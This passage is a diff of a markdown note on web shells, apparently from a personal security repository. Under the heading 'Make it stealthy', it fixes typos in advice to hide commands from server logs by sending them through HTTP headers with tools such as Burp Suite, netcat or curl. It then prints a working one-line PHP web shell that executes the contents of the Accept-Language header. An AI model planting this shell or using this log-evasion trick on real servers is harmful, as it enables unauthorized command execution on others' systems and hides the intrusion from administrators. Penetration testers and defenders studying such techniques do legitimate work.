Reboare/security/webshell.md

 ### Make it stealthy

 We can make the commands from above a bit more stealthy.
-Instead of passing the cmds through the url, which will be obvious in logs, we cna pass them through other header-paramters.
-The use tampterdata or burpsuite to insert the commands.
-Or just netcat or curl.
+Instead of passing the cmd through the url, which will be obvious in logs, we can pass them through other header-parameters.
+We can use a tool like Burp Suite or even just netcat or curl to insert these commands.

 ```php
 <?php system($_SERVER['HTTP_ACCEPT_LANGUAGE']); ?>